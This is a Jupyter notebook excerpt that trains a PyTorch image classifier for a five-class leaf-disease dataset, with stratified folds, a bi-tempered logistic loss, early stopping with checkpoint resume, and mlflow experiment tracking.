inflating: input/train_images/2361236588.jpg
inflating: input/train_images/2889971119.jpg
inflating: input/train_images/1232852695.jpg
inflating: input/train_images/294829234.jpg
inflating: input/train_images/847946899.jpg
inflating: input/train_images/450239051.jpg
inflating: input/train_images/2120170838.jpg
inflating: input/train_images/270643654.jpg
inflating: input/train_images/3340101218.jpg
inflating: input/train_images/1784432938.jpg
inflating: input/train_images/2618441199.jpg
inflating: input/train_images/606006336.jpg
inflating: input/train_images/2051128435.jpg
inflating: input/train_images/1109418037.jpg
inflating: input/train_images/3031879144.jpg
inflating: input/train_images/4126193524.jpg
inflating: input/train_images/2190685942.jpg
inflating: input/train_images/3779623554.jpg
inflating: input/train_images/1150322026.jpg
inflating: input/train_images/1633537888.jpg
inflating: input/train_images/4155925395.jpg
inflating: input/train_images/3369161144.jpg
inflating: input/train_images/4239036041.jpg
inflating: input/train_images/59208991.jpg
inflating: input/train_images/3720115396.jpg
inflating: input/train_images/782478171.jpg
inflating: input/train_images/2882347147.jpg
inflating: input/train_images/3160420933.jpg
inflating: input/train_images/2435051665.jpg
inflating: input/train_images/2032441634.jpg
inflating: input/train_images/2847345267.jpg
inflating: input/train_images/60094859.jpg
inflating: input/train_images/3837457616.jpg
inflating: input/train_images/4291020124.jpg
inflating: input/train_images/673860639.jpg
inflating: input/train_images/3982368414.jpg
inflating: input/train_images/4123940124.jpg
inflating: input/train_images/1881799608.jpg
inflating: input/train_images/560592460.jpg
inflating: input/train_images/1393861868.jpg
inflating: input/train_images/428725949.jpg
inflating: input/train_images/2579865055.jpg
inflating: input/train_images/2202207984.jpg
inflating: input/train_images/730431773.jpg
inflating: input/train_images/3971597689.jpg
inflating: input/train_images/4107485206.jpg
inflating: input/train_images/248855703.jpg
extracting: input/sample_submission.csv
###Markdown
Library
###Code
# ====================================================
# Library
# ====================================================
import os
import datetime
import math
import time
import random
import shutil
from pathlib import Path
from contextlib import contextmanager
from collections import defaultdict, Counter
import scipy as sp
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn.metrics import accuracy_score
from sklearn.model_selection import StratifiedKFold
from tqdm.auto import tqdm
from functools import partial
import cv2
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam, SGD
import torchvision.models as models
from torch.nn.parameter import Parameter
from torch.utils.data import DataLoader, Dataset
from torch.optim.lr_scheduler import CosineAnnealingWarmRestarts, CosineAnnealingLR, ReduceLROnPlateau
from albumentations import (
Compose, OneOf, Normalize, Resize, RandomResizedCrop, RandomCrop, HorizontalFlip, VerticalFlip,
RandomBrightness, RandomContrast, RandomBrightnessContrast, Rotate, ShiftScaleRotate, Cutout,
IAAAdditiveGaussianNoise, Transpose
)
from albumentations.pytorch import ToTensorV2
from albumentations import ImageOnlyTransform
import timm
import mlflow
import warnings
warnings.filterwarnings('ignore')
if CFG['apex']:
from apex import amp
if CFG['debug']:
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
device = torch.device('cuda')
start_time = datetime.datetime.now()
start_time_str = start_time.strftime('%m%d%H%M')
###Output
_____no_output_____
###Markdown
Directory settings
###Code
# ====================================================
# Directory settings
# ====================================================
if os.path.exists(OUTPUT_DIR):
shutil.rmtree(OUTPUT_DIR)
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
###Output
_____no_output_____
###Markdown
save basic files
###Code
# with open(f'{OUTPUT_DIR}/{start_time_str}_TAG.json', 'w') as f:
# json.dump(TAG, f, indent=4)
# with open(f'{OUTPUT_DIR}/{start_time_str}_CFG.json', 'w') as f:
# json.dump(CFG, f, indent=4)
import shutil
notebook_path = f'{OUTPUT_DIR}/{start_time_str}_{TITLE}.ipynb'
shutil.copy2(NOTEBOOK_PATH, notebook_path)
###Output
_____no_output_____
###Markdown
Data Loading
###Code
train = pd.read_csv(f'{DATA_PATH}/train.csv')
test = pd.read_csv(f'{DATA_PATH}/sample_submission.csv')
label_map = pd.read_json(f'{DATA_PATH}/label_num_to_disease_map.json',
orient='index')
if CFG['debug']:
train = train.sample(n=1000, random_state=CFG['seed']).reset_index(drop=True)
###Output
_____no_output_____
###Markdown
Utils
###Code
# ====================================================
# Utils
# ====================================================
def get_score(y_true, y_pred):
return accuracy_score(y_true, y_pred)
@contextmanager
def timer(name):
t0 = time.time()
LOGGER.info(f'[{name}] start')
yield
LOGGER.info(f'[{name}] done in {time.time() - t0:.0f} s.')
def init_logger(log_file=OUTPUT_DIR+'train.log'):
from logging import getLogger, INFO, FileHandler, Formatter, StreamHandler
logger = getLogger(__name__)
logger.setLevel(INFO)
handler1 = StreamHandler()
handler1.setFormatter(Formatter("%(message)s"))
handler2 = FileHandler(filename=log_file)
handler2.setFormatter(Formatter("%(message)s"))
logger.addHandler(handler1)
logger.addHandler(handler2)
return logger
logger_path = OUTPUT_DIR+f'{start_time_str}_train.log'
LOGGER = init_logger(logger_path)
def seed_torch(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
seed_torch(seed=CFG['seed'])
class EarlyStopping:
"""Early stops the training if validation loss doesn't improve after a given patience."""
def __init__(self, patience=7, verbose=False, save_path='checkpoint.pt',
counter=0, best_score=None, save_latest_path=None):
"""
Args:
patience (int): How long to wait after last time validation loss improved.
Default: 7
verbose (bool): If True, prints a message for each validation loss improvement.
Default: False
save_path (str): Directory for saving a model.
Default: "'checkpoint.pt'"
"""
self.patience = patience
self.verbose = verbose
self.save_path = save_path
self.counter = counter
self.best_score = best_score
self.save_latest_path = save_latest_path
self.early_stop = False
self.val_loss_min = np.Inf
def __call__(self, val_loss, model, preds, epoch):
score = -val_loss
if self.best_score is None:
self.best_score = score
self.save_checkpoint(val_loss, model, preds, epoch)
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
elif score >= self.best_score:
self.counter = 0
self.best_score = score
self.save_checkpoint(val_loss, model, preds, epoch)
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
# nanになったら学習ストップ
elif math.isnan(score):
self.early_stop = True
else:
self.counter += 1
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
if self.verbose:
print(f'EarlyStopping counter: {self.counter} out of {self.patience}')
if self.counter >= self.patience:
self.early_stop = True
def save_checkpoint(self, val_loss, model, preds, epoch):
'''Saves model when validation loss decrease.'''
if self.verbose:
print(f'Validation loss decreased ({self.val_loss_min:.10f} --> {val_loss:.10f}). Saving model ...')
torch.save({'model': model.state_dict(), 'preds': preds,
'epoch' : epoch, 'best_score' : self.best_score, 'counter' : self.counter},
self.save_path)
self.val_loss_min = val_loss
def save_latest(self, val_loss, model, preds, epoch, score):
'''Saves latest model.'''
torch.save({'model': model.state_dict(), 'preds': preds,
'epoch' : epoch, 'score' : score, 'counter' : self.counter},
self.save_latest_path)
self.val_loss_min = val_loss
###Output
_____no_output_____
###Markdown
CV split
###Code
folds = train.copy()
Fold = StratifiedKFold(n_splits=CFG['n_fold'], shuffle=True, random_state=CFG['seed'])
for n, (train_index, val_index) in enumerate(Fold.split(folds, folds[CFG['target_col']])):
folds.loc[val_index, 'fold'] = int(n)
folds['fold'] = folds['fold'].astype(int)
print(folds.groupby(['fold', CFG['target_col']]).size())
###Output
fold label
0 0 218
1 438
2 477
3 2631
4 516
1 0 218
1 438
2 477
3 2631
4 516
2 0 217
1 438
2 477
3 2632
4 515
3 0 217
1 438
2 477
3 2632
4 515
4 0 217
1 437
2 478
3 2632
4 515
dtype: int64
###Markdown
Dataset
###Code
# ====================================================
# Dataset
# ====================================================
class TrainDataset(Dataset):
def __init__(self, df, transform=None):
self.df = df
self.file_names = df['image_id'].values
self.labels = df['label'].values
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
file_name = self.file_names[idx]
file_path = f'{DATA_PATH}/train_images/{file_name}'
image = cv2.imread(file_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if self.transform:
augmented = self.transform(image=image)
image = augmented['image']
label = torch.tensor(self.labels[idx]).long()
return image, label
class TestDataset(Dataset):
def __init__(self, df, transform=None):
self.df = df
self.file_names = df['image_id'].values
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
file_name = self.file_names[idx]
file_path = f'{DATA_PATH}/test_images/{file_name}'
image = cv2.imread(file_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if self.transform:
augmented = self.transform(image=image)
image = augmented['image']
return image
# train_dataset = TrainDataset(train, transform=None)
# for i in range(1):
# image, label = train_dataset[i]
# plt.imshow(image)
# plt.title(f'label: {label}')
# plt.show()
###Output
_____no_output_____
###Markdown
Transforms
###Code
def _get_augmentations(aug_list):
process = []
for aug in aug_list:
if aug == 'Resize':
process.append(Resize(CFG['size'], CFG['size']))
elif aug == 'RandomResizedCrop':
process.append(RandomResizedCrop(CFG['size'], CFG['size']))
elif aug == 'Transpose':
process.append(Transpose(p=0.5))
elif aug == 'HorizontalFlip':
process.append(HorizontalFlip(p=0.5))
elif aug == 'VerticalFlip':
process.append(VerticalFlip(p=0.5))
elif aug == 'ShiftScaleRotate':
process.append(ShiftScaleRotate(p=0.5))
elif aug == 'Normalize':
process.append(Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225],
))
else:
raise ValueError(f'{aug} is not suitable')
process.append(ToTensorV2())
return process
# ====================================================
# Transforms
# ====================================================
def get_transforms(*, data):
if data == 'train':
return Compose(
_get_augmentations(TAG['augmentation'])
)
elif data == 'valid':
return Compose(
_get_augmentations(['Resize', 'Normalize'])
)
# train_dataset = TrainDataset(train, transform=get_transforms(data='train'))
# for i in range(1):
# image, label = train_dataset[i]
# plt.imshow(image[0])
# plt.title(f'label: {label}')
# plt.show()
###Output
_____no_output_____
###Markdown
Bi-tempered logistic loss
###Code
def log_t(u, t):
"""Compute log_t for `u'."""
if t==1.0:
return u.log()
else:
return (u.pow(1.0 - t) - 1.0) / (1.0 - t)
def exp_t(u, t):
"""Compute exp_t for `u'."""
if t==1:
return u.exp()
else:
return (1.0 + (1.0-t)*u).relu().pow(1.0 / (1.0 - t))
def compute_normalization_fixed_point(activations, t, num_iters):
"""Returns the normalization value for each example (t > 1.0).
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (> 1.0 for tail heaviness).
num_iters: Number of iterations to run the method.
Return: A tensor of same shape as activation with the last dimension being 1.
"""
mu, _ = torch.max(activations, -1, keepdim=True)
normalized_activations_step_0 = activations - mu
normalized_activations = normalized_activations_step_0
for _ in range(num_iters):
logt_partition = torch.sum(
exp_t(normalized_activations, t), -1, keepdim=True)
normalized_activations = normalized_activations_step_0 * \
logt_partition.pow(1.0-t)
logt_partition = torch.sum(
exp_t(normalized_activations, t), -1, keepdim=True)
normalization_constants = - log_t(1.0 / logt_partition, t) + mu
return normalization_constants
def compute_normalization_binary_search(activations, t, num_iters):
"""Returns the normalization value for each example (t < 1.0).
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (< 1.0 for finite support).
num_iters: Number of iterations to run the method.
Return: A tensor of same rank as activation with the last dimension being 1.
"""
mu, _ = torch.max(activations, -1, keepdim=True)
normalized_activations = activations - mu
effective_dim = \
torch.sum(
(normalized_activations > -1.0 / (1.0-t)).to(torch.int32),
dim=-1, keepdim=True).to(activations.dtype)
shape_partition = activations.shape[:-1] + (1,)
lower = torch.zeros(shape_partition, dtype=activations.dtype, device=activations.device)
upper = -log_t(1.0/effective_dim, t) * torch.ones_like(lower)
for _ in range(num_iters):
logt_partition = (upper + lower)/2.0
sum_probs = torch.sum(
exp_t(normalized_activations - logt_partition, t),
dim=-1, keepdim=True)
update = (sum_probs < 1.0).to(activations.dtype)
lower = torch.reshape(
lower * update + (1.0-update) * logt_partition,
shape_partition)
upper = torch.reshape(
upper * (1.0 - update) + update * logt_partition,
shape_partition)
logt_partition = (upper + lower)/2.0
return logt_partition + mu
class ComputeNormalization(torch.autograd.Function):
"""
Class implementing custom backward pass for compute_normalization. See compute_normalization.
"""
@staticmethod
def forward(ctx, activations, t, num_iters):
if t < 1.0:
normalization_constants = compute_normalization_binary_search(activations, t, num_iters)
else:
normalization_constants = compute_normalization_fixed_point(activations, t, num_iters)
ctx.save_for_backward(activations, normalization_constants)
ctx.t=t
return normalization_constants
@staticmethod
def backward(ctx, grad_output):
activations, normalization_constants = ctx.saved_tensors
t = ctx.t
normalized_activations = activations - normalization_constants
probabilities = exp_t(normalized_activations, t)
escorts = probabilities.pow(t)
escorts = escorts / escorts.sum(dim=-1, keepdim=True)
grad_input = escorts * grad_output
return grad_input, None, None
def compute_normalization(activations, t, num_iters=5):
"""Returns the normalization value for each example.
Backward pass is implemented.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
num_iters: Number of iterations to run the method.
Return: A tensor of same rank as activation with the last dimension being 1.
"""
return ComputeNormalization.apply(activations, t, num_iters)
def tempered_sigmoid(activations, t, num_iters = 5):
"""Tempered sigmoid function.
Args:
activations: Activations for the positive class for binary classification.
t: Temperature tensor > 0.0.
num_iters: Number of iterations to run the method.
Returns:
A probabilities tensor.
"""
internal_activations = torch.stack([activations,
torch.zeros_like(activations)],
dim=-1)
internal_probabilities = tempered_softmax(internal_activations, t, num_iters)
return internal_probabilities[..., 0]
def tempered_softmax(activations, t, num_iters=5):
"""Tempered softmax function.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature > 1.0.
num_iters: Number of iterations to run the method.
Returns:
A probabilities tensor.
"""
if t == 1.0:
return activations.softmax(dim=-1)
normalization_constants = compute_normalization(activations, t, num_iters)
return exp_t(activations - normalization_constants, t)
def bi_tempered_binary_logistic_loss(activations,
labels,
t1,
t2,
label_smoothing = 0.0,
num_iters=5,
reduction='mean'):
"""Bi-Tempered binary logistic loss.
Args:
activations: A tensor containing activations for class 1.
labels: A tensor with shape as activations, containing probabilities for class 1
t1: Temperature 1 (< 1.0 for boundedness).
t2: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
label_smoothing: Label smoothing
num_iters: Number of iterations to run the method.
Returns:
A loss tensor.
"""
internal_activations = torch.stack([activations,
torch.zeros_like(activations)],
dim=-1)
internal_labels = torch.stack([labels.to(activations.dtype),
1.0 - labels.to(activations.dtype)],
dim=-1)
return bi_tempered_logistic_loss(internal_activations,
internal_labels,
t1,
t2,
label_smoothing = label_smoothing,
num_iters = num_iters,
reduction = reduction)
def bi_tempered_logistic_loss(activations,
labels,
t1,
t2,
label_smoothing=0.0,
num_iters=5,
reduction = 'mean'):
"""Bi-Tempered Logistic Loss.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
labels: A tensor with shape and dtype as activations (onehot),
or a long tensor of one dimension less than activations (pytorch standard)
t1: Temperature 1 (< 1.0 for boundedness).
t2: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
label_smoothing: Label smoothing parameter between [0, 1). Default 0.0.
num_iters: Number of iterations to run the method. Default 5.
reduction: ``'none'`` | ``'mean'`` | ``'sum'``. Default ``'mean'``.
``'none'``: No reduction is applied, return shape is shape of
activations without the last dimension.
``'mean'``: Loss is averaged over minibatch. Return shape (1,)
``'sum'``: Loss is summed over minibatch. Return shape (1,)
Returns:
A loss tensor.
"""
if len(labels.shape)<len(activations.shape): #not one-hot
labels_onehot = torch.zeros_like(activations)
labels_onehot.scatter_(1, labels[..., None], 1)
else:
labels_onehot = labels
if label_smoothing > 0:
num_classes = labels_onehot.shape[-1]
labels_onehot = ( 1 - label_smoothing * num_classes / (num_classes - 1) ) \
* labels_onehot + \
label_smoothing / (num_classes - 1)
probabilities = tempered_softmax(activations, t2, num_iters)
loss_values = labels_onehot * log_t(labels_onehot + 1e-10, t1) \
- labels_onehot * log_t(probabilities, t1) \
- labels_onehot.pow(2.0 - t1) / (2.0 - t1) \
+ probabilities.pow(2.0 - t1) / (2.0 - t1)
loss_values = loss_values.sum(dim = -1) #sum over classes
if reduction == 'none':
return loss_values
if reduction == 'sum':
return loss_values.sum()
if reduction == 'mean':
return loss_values.mean()
###Output
_____no_output_____
###Markdown
MODEL
###Code
# ====================================================
# MODEL
# ====================================================
class CustomModel(nn.Module):
def __init__(self, model_name, pretrained=False):
super().__init__()
self.model = timm.create_model(model_name, pretrained=pretrained)
if hasattr(self.model, 'classifier'):
n_features = self.model.classifier.in_features
self.model.classifier = nn.Linear(n_features, CFG['target_size'])
elif hasattr(self.model, 'fc'):
n_features = self.model.fc.in_features
self.model.fc = nn.Linear(n_features, CFG['target_size'])
def forward(self, x):
x = self.model(x)
return x
model = CustomModel(model_name=TAG['model_name'], pretrained=False)
train_dataset = TrainDataset(train, transform=get_transforms(data='train'))
train_loader = DataLoader(train_dataset, batch_size=4, shuffle=True,
num_workers=4, pin_memory=True, drop_last=True)
for image, label in train_loader:
output = model(image)
print(output)
break
###Output
tensor([[ 0.0580, -0.0301, -0.0442, -0.0052, 0.0200],
[-0.7939, 0.2998, 0.3610, -0.0214, -0.2829],
[ 0.0389, 0.0104, 0.0070, -0.0092, 0.0260],
[ 0.0650, -0.0144, -0.0336, -0.0112, 0.0293]],
grad_fn=<AddmmBackward>)
###Markdown
Helper functions
###Code
# ====================================================
# Helper functions
# ====================================================
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def asMinutes(s):
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
def timeSince(since, percent):
now = time.time()
s = now - since
es = s / (percent)
rs = es - s
return '%s (remain %s)' % (asMinutes(s), asMinutes(rs))
# ====================================================
# loss
# ====================================================
def get_loss(criterion, y_preds, labels):
if TAG['criterion']=='CrossEntropyLoss':
loss = criterion(y_preds, labels)
elif TAG['criterion'] == 'bi_tempered_logistic_loss':
loss = criterion(y_preds, labels, t1=CFG['bi_tempered_loss_t1'], t2=CFG['bi_tempered_loss_t2'])
return loss
# ====================================================
# Helper functions
# ====================================================
def train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
start = end = time.time()
global_step = 0
for step, (images, labels) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
images = images.to(device)
labels = labels.to(device)
batch_size = labels.size(0)
y_preds = model(images)
loss = get_loss(criterion, y_preds, labels)
# record loss
losses.update(loss.item(), batch_size)
if CFG['gradient_accumulation_steps'] > 1:
loss = loss / CFG['gradient_accumulation_steps']
if CFG['apex']:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), CFG['max_grad_norm'])
if (step + 1) % CFG['gradient_accumulation_steps'] == 0:
optimizer.step()
optimizer.zero_grad()
global_step += 1
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % CFG['print_freq'] == 0 or step == (len(train_loader)-1):
print('Epoch: [{0}][{1}/{2}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Elapsed {remain:s} '
'Loss: {loss.val:.4f}({loss.avg:.4f}) '
'Grad: {grad_norm:.4f} '
#'LR: {lr:.6f} '
.format(
epoch+1, step, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
remain=timeSince(start, float(step+1)/len(train_loader)),
grad_norm=grad_norm,
#lr=scheduler.get_lr()[0],
))
return losses.avg
def valid_fn(valid_loader, model, criterion, device):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to evaluation mode
model.eval()
preds = []
start = end = time.time()
for step, (images, labels) in enumerate(valid_loader):
# measure data loading time
data_time.update(time.time() - end)
images = images.to(device)
labels = labels.to(device)
batch_size = labels.size(0)
# compute loss
with torch.no_grad():
y_preds = model(images)
loss = get_loss(criterion, y_preds, labels)
losses.update(loss.item(), batch_size)
# record accuracy
preds.append(y_preds.softmax(1).to('cpu').numpy())
if CFG['gradient_accumulation_steps'] > 1:
loss = loss / CFG['gradient_accumulation_steps']
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % CFG['print_freq'] == 0 or step == (len(valid_loader)-1):
print('EVAL: [{0}/{1}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Elapsed {remain:s} '
'Loss: {loss.val:.4f}({loss.avg:.4f}) '
.format(
step, len(valid_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
remain=timeSince(start, float(step+1)/len(valid_loader)),
))
predictions = np.concatenate(preds)
return losses.avg, predictions
def inference(model, states, test_loader, device):
model.to(device)
tk0 = tqdm(enumerate(test_loader), total=len(test_loader))
probs = []
for i, (images) in tk0:
images = images.to(device)
avg_preds = []
for state in states:
# model.load_state_dict(state['model'])
model.load_state_dict(state)
model.eval()
with torch.no_grad():
y_preds = model(images)
avg_preds.append(y_preds.softmax(1).to('cpu').numpy())
avg_preds = np.mean(avg_preds, axis=0)
probs.append(avg_preds)
probs = np.concatenate(probs)
return probs
###Output
_____no_output_____
###Markdown
Train loop
###Code
# ====================================================
# scheduler
# ====================================================
def get_scheduler(optimizer):
if TAG['scheduler']=='ReduceLROnPlateau':
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=CFG['factor'], patience=CFG['patience'], verbose=True, eps=CFG['eps'])
elif TAG['scheduler']=='CosineAnnealingLR':
scheduler = CosineAnnealingLR(optimizer, T_max=CFG['T_max'], eta_min=CFG['min_lr'], last_epoch=-1)
elif TAG['scheduler']=='CosineAnnealingWarmRestarts':
scheduler = CosineAnnealingWarmRestarts(optimizer, T_0=CFG['T_0'], T_mult=1, eta_min=CFG['min_lr'], last_epoch=-1)
return scheduler
# ====================================================
# criterion
# ====================================================
def get_criterion():
if TAG['criterion']=='CrossEntropyLoss':
criterion = nn.CrossEntropyLoss()
elif TAG['criterion'] == 'bi_tempered_logistic_loss':
criterion = bi_tempered_logistic_loss
return criterion
# ====================================================
# Train loop
# ====================================================
def train_loop(folds, fold):
LOGGER.info(f"========== fold: {fold} training ==========")
if not CFG['debug']:
mlflow.set_tag('running.fold', str(fold))
# ====================================================
# loader
# ====================================================
trn_idx = folds[folds['fold'] != fold].index
val_idx = folds[folds['fold'] == fold].index
train_folds = folds.loc[trn_idx].reset_index(drop=True)
valid_folds = folds.loc[val_idx].reset_index(drop=True)
train_dataset = TrainDataset(train_folds,
transform=get_transforms(data='train'))
valid_dataset = TrainDataset(valid_folds,
transform=get_transforms(data='valid'))
train_loader = DataLoader(train_dataset,
batch_size=CFG['batch_size'],
shuffle=True,
num_workers=CFG['num_workers'], pin_memory=True, drop_last=True)
valid_loader = DataLoader(valid_dataset,
batch_size=CFG['batch_size'],
shuffle=False,
num_workers=CFG['num_workers'], pin_memory=True, drop_last=False)
# ====================================================
# model & optimizer & criterion
# ====================================================
best_model_path = OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_best.pth'
latest_model_path = OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_latest.pth'
model = CustomModel(TAG['model_name'], pretrained=True)
model.to(device)
# 学習途中の重みがあれば読み込み
if os.path.isfile(latest_model_path):
state_latest = torch.load(latest_model_path)
state_best = torch.load(best_model_path)
model.load_state_dict(state_latest['model'])
epoch_start = state_latest['epoch']+1
# er_best_score = state_latest['score']
er_counter = state_latest['counter']
er_best_score = state_best['best_score']
LOGGER.info(f'Retrain model in epoch:{epoch_start}, best_score:{er_best_score:.3f}, counter:{er_counter}')
# # bestしか保存していない用(後で消す)
# elif os.path.isfile(best_model_path):
# state_best = torch.load(best_model_path)
# model.load_state_dict(state_best['model'])
# epoch_start = state_best['epoch']+1
# # er_best_score = state_latest['score']
# er_counter = state_best['counter']
# er_best_score = state_best['best_score']
# LOGGER.info(f'Retrain model in epoch:{epoch_start}, best_score:{er_best_score:.3f}, counter:{er_counter}')
else:
epoch_start = 0
er_best_score = None
er_counter = 0
optimizer = Adam(model.parameters(), lr=CFG['lr'], weight_decay=CFG['weight_decay'], amsgrad=False)
scheduler = get_scheduler(optimizer)
criterion = get_criterion()
# ====================================================
# apex
# ====================================================
if CFG['apex']:
model, optimizer = amp.initialize(model, optimizer, opt_level='O1', verbosity=0)
# ====================================================
# loop
# ====================================================
# best_score = 0.
# best_loss = np.inf
early_stopping = EarlyStopping(
patience=CFG['early_stopping_round'],
verbose=True,
save_path=best_model_path,
counter=er_counter, best_score=er_best_score,
save_latest_path=latest_model_path)
for epoch in range(epoch_start, CFG['epochs']):
start_time = time.time()
# train
avg_loss = train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device)
# eval
avg_val_loss, preds = valid_fn(valid_loader, model, criterion, device)
valid_labels = valid_folds[CFG['target_col']].values
# early stopping
early_stopping(avg_val_loss, model, preds, epoch)
if early_stopping.early_stop:
print(f'Epoch {epoch+1} - early stopping')
break
if isinstance(scheduler, ReduceLROnPlateau):
scheduler.step(avg_val_loss)
elif isinstance(scheduler, CosineAnnealingLR):
scheduler.step()
elif isinstance(scheduler, CosineAnnealingWarmRestarts):
scheduler.step()
# scoring
score = get_score(valid_labels, preds.argmax(1))
elapsed = time.time() - start_time
LOGGER.info(f'Epoch {epoch+1} - avg_train_loss: {avg_loss:.4f} avg_val_loss: {avg_val_loss:.4f} time: {elapsed:.0f}s')
LOGGER.info(f'Epoch {epoch+1} - Accuracy: {score}')
# log mlflow
if not CFG['debug']:
mlflow.log_metric(f"fold{fold} avg_train_loss", avg_loss, step=epoch)
mlflow.log_metric(f"fold{fold} avg_valid_loss", avg_val_loss, step=epoch)
mlflow.log_metric(f"fold{fold} score", score, step=epoch)
mlflow.log_metric(f"fold{fold} lr", scheduler.get_last_lr()[0], step=epoch)
mlflow.log_artifact(best_model_path)
if os.path.isfile(latest_model_path):
mlflow.log_artifact(latest_model_path)
check_point = torch.load(OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_best.pth')
valid_folds[[str(c) for c in range(5)]] = check_point['preds']
valid_folds['preds'] = check_point['preds'].argmax(1)
return valid_folds
# ====================================================
# main
# ====================================================
def get_result(result_df):
preds = result_df['preds'].values
labels = result_df[CFG['target_col']].values
score = get_score(labels, preds)
LOGGER.info(f'Score: {score:<.5f}')
return score
def main():
"""
Prepare: 1.train 2.test 3.submission 4.folds
"""
if CFG['train']:
# train
oof_df = pd.DataFrame()
for fold in range(CFG['n_fold']):
if fold in CFG['trn_fold']:
_oof_df = train_loop(folds, fold)
oof_df = pd.concat([oof_df, _oof_df])
LOGGER.info(f"========== fold: {fold} result ==========")
_ = get_result(_oof_df)
# CV result
LOGGER.info(f"========== CV ==========")
score = get_result(oof_df)
# save result
oof_df.to_csv(OUTPUT_DIR+'oof_df.csv', index=False)
# log mlflow
if not CFG['debug']:
mlflow.log_metric('oof score', score)
mlflow.delete_tag('running.fold')
mlflow.log_artifact(OUTPUT_DIR+'oof_df.csv')
if CFG['inference']:
# inference
model = CustomModel(TAG['model_name'], pretrained=False)
states = [torch.load(OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_best.pth') for fold in CFG['trn_fold']]
test_dataset = TestDataset(test, transform=get_transforms(data='valid'))
test_loader = DataLoader(test_dataset, batch_size=CFG['batch_size'], shuffle=False,
num_workers=CFG['num_workers'], pin_memory=True)
predictions = inference(model, states, test_loader, device)
# submission
test['label'] = predictions.argmax(1)
test[['image_id', 'label']].to_csv(OUTPUT_DIR+'submission.csv', index=False)
###Output
_____no_output_____
###Markdown
rerun
###Code
def _load_save_point(run_id):
# どこで中断したか取得
stop_fold = int(mlflow.get_run(run_id=run_id).to_dictionary()['data']['tags']['running.fold'])
# 学習対象のfoldを変更
CFG['trn_fold'] = [fold for fold in CFG['trn_fold'] if fold>=stop_fold]
# 学習済みモデルがあれば.pthファイルを取得(学習中も含む)
client = mlflow.tracking.MlflowClient()
artifacts = [artifact for artifact in client.list_artifacts(run_id) if ".pth" in artifact.path]
for artifact in artifacts:
client.download_artifacts(run_id, artifact.path, OUTPUT_DIR)
def check_have_run():
results = mlflow.search_runs(INFO['EXPERIMENT_ID'])
run_id_list = results[results['tags.mlflow.runName']==TITLE]['run_id'].tolist()
# 初めて実行する場合
if len(run_id_list) == 0:
run_id = None
# 既に実行されている場合
else:
assert len(run_id_list)==1
run_id = run_id_list[0]
_load_save_point(run_id)
return run_id
if __name__ == '__main__':
if CFG['debug']:
main()
else:
mlflow.set_tracking_uri(INFO['TRACKING_URI'])
mlflow.set_experiment('single model')
# 既に実行済みの場合は続きから実行する
run_id = check_have_run()
with mlflow.start_run(run_id=run_id, run_name=TITLE):
if run_id is None:
mlflow.log_artifact(CONFIG_PATH)
mlflow.log_param('device', device)
mlflow.set_tags(TAG)
mlflow.log_params(CFG)
mlflow.log_artifact(notebook_path)
main()
mlflow.log_artifacts(OUTPUT_DIR)
shutil.copytree(OUTPUT_DIR, f'{INFO["SHARE_DRIVE_PATH"]}/{TITLE}')
shutil.copy2(CONFIG_PATH, f'{INFO["SHARE_DRIVE_PATH"]}/{TITLE}/{CONFIG_NAME}')
###Output
========== fold: 4 training ==========
Retrain model in epoch:1, best_score:-0.129, counter:0
|
1 - Data Science Methodology/2.2 From Modeling to Evaluation.ipynb | ###Markdown
